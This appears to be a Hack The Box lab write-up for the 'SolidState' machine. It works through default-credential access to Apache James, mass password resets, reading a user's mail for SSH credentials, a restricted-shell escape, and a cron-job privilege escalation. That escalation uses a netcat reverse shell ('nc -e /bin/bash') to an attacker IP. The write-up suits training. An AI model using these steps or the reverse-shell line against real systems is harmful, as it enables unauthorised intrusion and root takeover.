---
title: "HTB - SolidState"
showdate: True
Date: "2021-04-20"
tags: ["Writeups"]
---

# SolidState

![SolidState%2002554ebc59b5438c9f6bfd58b9ee5ac4/Untitled.png](/writeups/SolidState/Untitled.png)

# Enumeration

## Nmap

Start by scanning all TCP ports

```bash
> nmap -T5 -p- -sV 10.129.137.109
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp?
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
110/tcp  open  pop3?
119/tcp  open  nntp?
4555/tcp open  rsip?
```

- Port 22: SSH - OpenSSH 7.4p1
- The version doesn't appear to be vulnerable to any exploits but should look for SSH credentials or keys
- Port 25: SMTP (Simple Mail Transfer Protocol)
- Port 110: POP3 (Post Office Protocol version 3)
- SMTP protocol is used for outgoing email from a mail client to an email server. SMTP servers are responsible for carrying out the transmission of email messages. They receive the messages from mail clients in the proper format on a port to then be sent out. Learn more: [https://www.duocircle.com/outbound-smtp/everything-you-need-to-know-about-smtp-server-and-why-do-you-need-one](https://www.duocircle.com/outbound-smtp/everything-you-need-to-know-about-smtp-server-and-why-do-you-need-one)
- POP3 protocols are used to receive emails from a mail server to a mail client.
- Examples of mail clients are Microsoft Outlook (Windows, Cost), Mozilla Thunderbird (Windows/Mac/Linux, Free), and Gmail (Web-based, Free)
- Both ports 25 and 110 are the default non-encrypted ports for their protocol.
- Port 80: HTTP - Apache httpd 2.4.25
- Didn't find anything significant in exploit-db. I think enumerating the webserver first is the best first step to find any vulnerabilities.
- Port 119: NNTP (Network News Transfer Protocol)
- NNTP is the protocol used to transfer (broadcast) messages/news articles to multiple news servers/sites

Nmap didn't detect the version of the application running on ports 25, 110, 119 so we will have to enumerate those ports more

## HTTP Enumeration

Let first start with enumerating the web server on port 80. The following web page is render. 

![SolidState%2002554ebc59b5438c9f6bfd58b9ee5ac4/Untitled%201.png](/writeups/SolidState/Untitled%201.png)

The application appears to be written with just HTML, CSS, and JavaScript. There is no PHP that is known to contain vulnerabilities so we should try to see if we can find any relevant information.
There's nothing interesting when searching in the directories after running go buster so we'll move on to enumerate the other open ports.

```bash
> gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u http://10.129.137.109 -o gobuster.txt -q
/images (Status: 301)       
/assets (Status: 301)
```

We are not trying to send an email or broadcast a message so we can skip port 25 and 119 for now and check port 110 and 4555.

## PORT 4555 Enumeration

Port 4555 seems interesting so lets see if we can connect to it with netcat.

```bash
> nc 10.129.137.109 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root 
Password:
root
```

We are able to find that port 4555 hosts Apache James Server with version 2.3.2. With a quick google search, we can find the default credentials to be root, root.

Using the HELP command we can see that we can list users and change their passwords. Let's change all their passwords to 'password'

```bash
Welcome root. HELP for a list of commands
HELP 
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword james password 
Password for james reset
setpassword thomas password 
Password for thomas reset
setpassword john password 
Password for john reset
setpassword mindy password 
Password for mindy reset
setpassword mailadmin password 
Password for mailadmin reset
```

User accounts are shared across services provided by Apache James Server so the same accounts are used on SMTP, POP3, and NNTP services. The JAMES Remote Administration Tool 2.3.2 is allowing us the ability to manage and create accounts using netcat.

## POP3 Enumeration

Let's check POP3 server for any stored emails by connecting with telnet. You could use a mail client like Mozilla Thunderbird if you prefer.

POP3 commands to reference [https://electrictoolbox.com/pop3-commands/](https://electrictoolbox.com/pop3-commands/)

If you go through each user we found in the James Remote Administration tool and retrieve their messages, you will eventually find a set of credentials for mindy to connect to the remote server via SSH.

```bash
> telnet 10.129.137.109 110
Trying 10.129.137.109...
Connected to 10.129.137.109.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy 
+OK
PASS password 
+OK Welcome mindy
LIST 
+OK 2 1945
1 1109
2 836
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James
```

SSH credentials

username: mindy

password: P@55W0rd1!2@

## Getting User Shell

We can verify if the credential work by using the ssh command

```bash
> ssh mindy@10.129.137.109
The authenticity of host '10.129.137.109 (10.129.137.109)' can't be established.
ED25519 key fingerprint is SHA256:rC5LxqIPhybBFae7BXE/MWyG4ylXjaZJn6z2/1+GmJg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.137.109' (ED25519) to the list of known hosts.
mindy@10.129.137.109's password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ cd /
-rbash: cd: restricted
```

Looks like we are in a restricted sell (rshell) and we can confirm this by check the shell for mindy in /etc/passwd file or printing the shell environment variable.

```bash
> cat /etc/passwd
# other users above
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
> echo $SHELL
/bin/rbash
```

Let check to see what command we can run.

```bash
mindy@solidstate:~$ echo $PATH
/home/mindy/bin
mindy@solidstate:~$ ls -l /home/mindy/bin/
total 0
lrwxrwxrwx 1 root root 8 Aug 22  2017 cat -> /bin/cat
lrwxrwxrwx 1 root root 8 Aug 22  2017 env -> /bin/env
lrwxrwxrwx 1 root root 7 Aug 22  2017 ls -> /bin/ls
```

## Bypassing Restricted Shell

We need to bypass the restricted shell and can find the technique in the link below.

[https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf](https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf)

Exit out of the current SSH session and create a new SSH session with the command below.

```bash
> ssh mindy@10.129.137.109 -t "bash --noprofile"
```

This command worked and was able to get an unrestricted shell.

```bash
> ssh mindy@10.129.137.109 -t "bash --noprofile"
mindy@10.129.137.109's password: 
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
```

# Privilege Escalation

## Find PE Attack Vector

Run LinEnum to see if we can find anything interesting

```bash
> wget 10.10.17.103:8000/LinEnum.sh -q
> chmod +x LinEnum.sh
> ./LinEnum -t
```

If we scroll through the output we are able to see that there is a python script that is a world-writable file owned by root.

```bash
[-] World-writable files (excluding /proc and /sys):
-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
```

The script is able to run OS commands and is ran as the root users so if can run a command to execute a reverse shell, we can get a root shell. 

We need to see if there is a cron job running the tmp.py and can do that with [pspy](https://github.com/DominicBreuker/pspy/). 

```bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ wget 10.10.17.103:8000/pspy32 -q
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ./pspy32
```

```bash
2021/04/20 03:57:00 CMD: UID=0    PID=2143   | run-parts --list /etc/dhcp/dhclient-exit-hooks.d 
2021/04/20 03:57:01 CMD: UID=0    PID=2144   | /usr/sbin/CRON -f 
2021/04/20 03:57:01 CMD: UID=0    PID=2145   | /usr/sbin/CRON -f 
2021/04/20 03:57:01 CMD: UID=0    PID=2146   | /bin/sh -c python /opt/tmp.py 
2021/04/20 03:57:01 CMD: UID=0    PID=2147   | python /opt/tmp.py 
2021/04/20 03:57:01 CMD: UID=0    PID=2148   | rm -r /tmp/pspy32 
2021/04/20 04:00:01 CMD: UID=0    PID=2149   | /usr/sbin/CRON -f 
2021/04/20 04:00:01 CMD: UID=0    PID=2150   | /usr/sbin/CRON -f 
2021/04/20 04:00:01 CMD: UID=0    PID=2151   | /bin/sh -c python /opt/tmp.py 
2021/04/20 04:00:01 CMD: UID=0    PID=2152   | python /opt/tmp.py
```

We can see that tmp.py is running every 3 minutes so now we can change the python script to execute a reverse shell and to get a root shell

Let's replace the python script with a [python reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet), set up netcat listener on the attacking on port 4444, and then wait for the cron job to execute the python script to get a reverse shell.

```bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('nc -e /bin/bash 10.10.17.103 4444')
except:
     sys.exit()
```

We are now root

```bash
> nc -lnvp 4444
Connection from 10.129.137.109:52852
id
uid=0(root) gid=0(root) groups=0(root)
```

# Exploitation

We could have also exploited a known vulnerability in Apache James Server 2.3.0 

Searching in exploit-db, there is a verified exploit for this software [https://www.exploit-db.com/exploits/355](https://www.exploit-db.com/exploits/35513)

We could run the script and to get initial access with a low privilege user account.

We could follow the steps earlier in this writeup in PE to gain a root shell.

### Notes

What is the difference between a service and protocol?

[https://www.duocircle.com/content/smtp-service](https://www.duocircle.com/content/smtp-service)

Protocol is the standard that is understand to send or receive data

Service is the application that send or receives data